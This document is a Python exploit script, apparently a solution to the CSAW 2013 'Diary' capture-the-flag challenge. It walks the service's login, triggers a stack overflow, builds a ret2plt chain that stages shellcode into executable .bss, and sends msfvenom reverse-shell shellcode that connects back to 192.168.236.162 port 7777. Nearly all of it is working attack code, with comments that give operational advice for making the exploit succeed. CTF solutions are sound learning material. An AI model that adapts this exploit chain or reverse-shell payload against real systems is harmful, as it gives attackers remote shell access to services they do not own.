

Diary

from socket import *
from struct import *
from time import sleep
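def p(x):
    """Pack *x* as a 32-bit little-endian unsigned int (one x86 stack word)."""
    return pack("<L", x)


def up(x):
    """Unpack a 32-bit little-endian unsigned int from the 4-byte buffer *x*."""
    return unpack("<L", x)[0]


HOST = "192.168.236.162"   # local
PORT = 34266

# Distance from the start of the overflowed buffer to the saved return
# address: 0x41c bytes of buffer, the extra 4 presumably the saved ebp.
buf_to_ret_offset = 0x41c + 4
# Writable .bss address: recv@plt writes the shellcode here and the chain then
# returns into it, so this only works if .bss is executable (no NX) and the
# binary is not PIE (the 0x0804xxxx addresses are fixed).
bss = 0x0804b008
# recv@plt -- the ret2plt target used to stage the second-stage shellcode.
recv_plt = 0x08048890
# Descriptor the server will recv() from.  4 is a guess (0-2 are the std
# streams, 3 presumably the listening socket); verify against the target.
fd = 4

# msfvenom linux/x86/shell_reverse_tcp LHOST=192.168.236.162 LPORT=7777
# The connect-back address and port are baked into the bytes (push 0xc0a8eca2,
# push 0x1e61/AF_INET), so regenerate the stage instead of editing HOST, and
# have a listener on 7777 up before running.  A bytes literal keeps the
# payload concatenation valid under both Python 2 and Python 3.
shellcode = (
    b"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd"
    b"\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\xec"
    b"\xa2\x68\x02\x00\x1e\x61\x89\xe1\xb0\x66\x50\x51\x53\xb3"
    b"\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    b"\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
)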
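# --- Exploit session -------------------------------------------------------
# Walk the service's login dialogue, send the "-1" answer that triggers the
# overflow, then deliver the ret2plt chain and finally the shellcode that the
# chain's recv@plt call pulls in.  Python 2 sockets have no context manager,
# so try/finally guarantees close() on any error.
s = socket()
try:
    s.connect((HOST, PORT))

    print(s.recv(2048))
    print(s.recv(2048))
    s.sendall(b"csaw2013")
    print(s.recv(2048))
    s.sendall(b"S1mplePWD")
    print(s.recv(2048))
    print(s.recv(2048))
    # "-1" presumably bypasses the length check and sets up the oversized
    # read -- confirm against the binary if the offset stops working.
    s.sendall(b"-1")
    sleep(1)

    # Overwrite the saved return address with recv@plt.  Fake frame:
    #   return address -> bss (where the shellcode will have been written)
    #   recv(fd, bss, len(shellcode), 0)
    payload = b"a" * buf_to_ret_offset
    payload += p(recv_plt) + p(bss) + p(fd) + p(bss) + p(len(shellcode)) + p(0)

    # sendall() instead of send(): send() may write only part of the ~1 KiB
    # payload and return early, silently truncating the chain.
    s.sendall(payload)
    # The pause presumably keeps the two stages from being coalesced into one
    # read before the target has returned into recv().
    sleep(1)
    # NOTE: the staged recv(len(shellcode)) can itself return short on a real
    # network; there is no loop on the target side, so keep the stage small
    # and send it in one call.
    s.sendall(shellcode)
finally:
    s.close()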